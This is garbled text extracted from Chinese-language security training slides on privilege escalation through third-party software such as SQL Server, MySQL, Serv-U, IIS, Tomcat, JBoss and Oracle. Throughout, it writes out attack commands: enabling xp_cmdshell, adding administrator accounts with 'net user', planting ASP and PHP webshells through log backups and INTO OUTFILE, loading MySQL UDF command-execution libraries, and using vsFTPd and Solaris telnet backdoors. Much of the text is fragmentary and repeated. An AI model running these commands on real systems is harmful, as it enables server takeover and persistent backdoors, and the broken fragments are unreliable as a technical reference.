實(shí)驗(yàn)課件三方應(yīng)用提權(quán)

溢出攻溢出攻擊與提啟明星辰培訓(xùn)認(rèn)證部—王新目目提權(quán)演提權(quán)演示——SQL3提權(quán)演提權(quán)演示——運(yùn)行SQLTools，輸入目標(biāo)服務(wù)器IP、用戶名和4提權(quán)演示提權(quán)演示——（在客戶端SSMS中執(zhí)行EXECsp_configure'showadvancedoptions',1--RECONFIGUREWITHOVERRIDE-EXECsp_configure'xp_cmdshell',1-EXECsp_configureoptions',0--5提權(quán)演示——dbccaddextendedproc提權(quán)演示——dbccaddextendedprocdbccaddextendedproc("xp_cmdshell","xplog70.dll")沙盒提權(quán)：（更多命令參考‘SQL修復(fù)資料.txt’）execmaster..xp_regwriteSelect*??????windows\system32\ias\ias.mdb','selectusersql$123/add")');Select*From?windows\system32\ias\ias.mdb','selectlocalgroupadministratorssql$6提權(quán)演提權(quán)演示——7提權(quán)演提權(quán)演示——混客SQL利用工具8提權(quán)演示——提權(quán)演示——點(diǎn)“設(shè)置”，連接SQL9提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——利用日志增量備份寫入一句話';alterdatabasevenussetRECOVERYFULL--';createtablecmd(aimage)--';backuplogvenustodisk='f:\cmd'with-';insertintocmd(a)values';backuplogvenustodisk‘c:\www\shell.asp'-??????提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——??mysql>usemysql>updateusersethost='%'wheremysql>flushC:\ProgramFiles\MySQL\MySQLServer??提權(quán)演示——提權(quán)演示——Usecreatetablevenus_tmp(cmdinsertintovenus_tmpvalues("<%executerequest("textarea1")%>");select*venus_tmpintoMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpudf提權(quán)命c(diǎn)reatetablet_tmp(abcudf提權(quán)命c(diǎn)reatetablet_tmp(abcinsertintot_tmp??????createtablet_tmp(dataLONGBLOB);insertintot_tmpvalues("");updatet_tmp ??select*fromt_tmpintodumpfilecreatefunctioncmdshellreturnsstringsoname'udf.dll';selectcmdshell('netuseraa/add');droptableifexists?????select*fromt_tmpintodumpfileudf提權(quán)命要注意命udf提權(quán)命要注意命令中的字符都是英文字//版selectselect//版//查看mysql安裝路show//看各種變量ADS與ADS與對于5.1以上版本，默認(rèn)不存在\lib\pluginselect'xxx'intooutfileMysql提Mysql提Udf提Udf提權(quán)-linux平createtablet_tmp(datainsertintot_tmpupdatet_tmpset ;Udf提權(quán)-linux平Udf提權(quán)-linux平3.得到plugin目showvariableslikeplugin_dir/usr/local/mysql/lib/mysql/pluginselectdatafromt_tmpintoDUMPFILECREATEFUNCTIONsys_evalRETURNSstringSONAME'lib_mysqludf_sys.so';selectsys_eval('ls-l?????????提權(quán)演提權(quán)演示——useuseauxiliary/scanner/mysql/mysql_versionuseauxiliary/scanner/mysql/mysql_loginuseauxiliary/scanner/mysql/mysql_hashdumpuseauxiliary/admin/mysql/mysql_enum（CVE-2012-2122MySQL驗(yàn)證繞過，256??Phpmyadmin提權(quán)思Phpmyadmin提權(quán)思CreateTABLEvv(cmdtextNOTNULL);InsertINTOvv(cmd)VALUES('<?phpselectcmdfromvvintooutfileDropTABLEIFEXISTSvv;???????Phpmyadmin提權(quán)思createtablePhpmyadmin提權(quán)思createtabletemp_mix(datainsertintotemp_mixvalues????updatesetselect*fromtemp_mixinto'C:\\Windows\\System32\\udf.dll';-- createfunctioncmdshellreturnsstringsonameselectcmdshell('netuseraa/add');droptableifexiststemp_mix;????Oracle提默Oracle提默認(rèn)用戶scott/tiger，具有resource利用sql注入將scott提權(quán)至創(chuàng)建PL/SQL過程執(zhí)行系統(tǒng)命execmongodbmongodb提PHPMoAdmincurl"/moadmin.php"-d提權(quán)提權(quán)演示——制權(quán)提權(quán)演提權(quán)演示——破解很簡單提權(quán)演示——??提權(quán)演示——??經(jīng)典的輸入法漏洞，SQLServer???提權(quán)演提權(quán)演示——端口可以利用4899弱口令掃描器掃出弱口提權(quán)演示提權(quán)演示——端口提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——利用vnc_passview獲取vnc的管理口提權(quán)提權(quán)演示——Serv-利用X-Scan發(fā)現(xiàn)Serv-U的一個弱口：Amdin+admin，此賬戶有執(zhí)行權(quán)提權(quán)命令QuotesiteexecnetusertestQuotesiteexecnetlocalgroupadministratorstest/add提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-默認(rèn)管理賬戶默認(rèn)管理密碼默認(rèn)綁定提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法一是利用提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法提權(quán)演提權(quán)演示——Serv-遠(yuǎn)程連接時注意端口填寫fpipe打開提權(quán)演示——Serv-提權(quán)演示——Serv-下載文件提權(quán)演示——Serv-提權(quán)演示——Serv-CdLcdPutServUDaemon.ini賬戶權(quán)限：e—執(zhí)行pHfs-2.x遠(yuǎn)Hfs-2.x遠(yuǎn)程代碼執(zhí)Hfs2.3DFileZilla提FileZilla提提權(quán)演提權(quán)演示——IIS權(quán)限不提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用IISPUTScaner可以批量掃描提權(quán)演提權(quán)演示——IIS寫權(quán)限利工具：老兵的IIS寫權(quán)限利用工Options選項(xiàng)可以查看IIS支持的操提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用PUT直接寫一個一句話木提權(quán)演提權(quán)演示——IIS寫權(quán)限利再用MOVE命令將test.txt修改為提權(quán)演提權(quán)演示——IIS寫權(quán)限利成功利用一句話后提權(quán)演示——IIS6解提權(quán)演示——IIS6解析漏1.muma.asp;jpg文件名有分號路徑名含有有個條件：文件上傳后，不會被重命提權(quán)演示提權(quán)演示——IIS7提IIS7的提權(quán)0day，針對MS10-065-KB2124261-KB2271195-CVE-2010-提權(quán)提權(quán)演示——Tomcat漏洞Tomcat漏洞利用工ApacheTomcatCrack自動化攻擊工具Tomcat批量Tomcat批量抓雞工提權(quán)演提權(quán)演示——Deployments>ManageDeployments>Add提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行phpjboss.php2提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行，工具JexBoss-JbossverifyandEXploitation提權(quán)演提權(quán)演示——Java反序列化，遠(yuǎn)程代碼執(zhí)行提權(quán)演提權(quán)演示——Java反序列化，反彈提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——WebLogicServerAdministrationConsoleworkshopDeploymentsWeb?????????提權(quán)提權(quán)演示——Elasticsearch提Elasticsearch提Elasticsearch遠(yuǎn)程代碼執(zhí)paddingpaddingPaddingoracle(MS10-070)漏洞檢測信息泄露、敏感文件讀取，例如paddingpadding查看源碼搜索WebResource.axd，找到然后，利用padBuster.pl計(jì)算Web.configZKonHQe3MWyTFog2IVA9Sj-ZKonHQe3MWyTFog216-encoding3-plaintext"|||~/Web.config“paddingpaddingrLCZG3p5Vx7zNIkXvQHI9QAAAAAAAAAAAAAAAAAAAAA116得到最終的秘鑰：（時間比較長提權(quán)示提權(quán)示例——搜狗拼搜狗拼音有一個問題提權(quán)示提權(quán)示例——搜狗拼此目錄下有一個升級程序提權(quán)示例——CVE2012-提權(quán)示例——CVE2012-cve:2012-useSetSetlhost提權(quán)示例——JavaRMI提權(quán)示例——JavaRMIServerInsecureDefaultJavaCodeExecutionuseSet提權(quán)示例——提權(quán)示例——提權(quán)提權(quán)示例——Solaris10條件：Solaris10/11的telnet服務(wù)開命令：telnetlfroot可以繞過驗(yàn)證直接以root身份登vsFTPsmilefacetelnetvsFTPsmilefacetelnetpass另一個終端:-(注意分telnetcat提權(quán)演示—Apache解析提權(quán)演示—Apache解析漏ext2和ext1沒有定從后向前依次按擴(kuò)展名嘗試解析文提權(quán)演提權(quán)演示——紅色為手工添加的部分,圖片被作為腳本解析提權(quán)演提權(quán)演示——Nginx的%00解析漏洞低版本nginx,可以在文件名后面，添加php-cgi默認(rèn)php-cgi默認(rèn)配置漏IISNginxCGIphp的web應(yīng)用程序，而Apache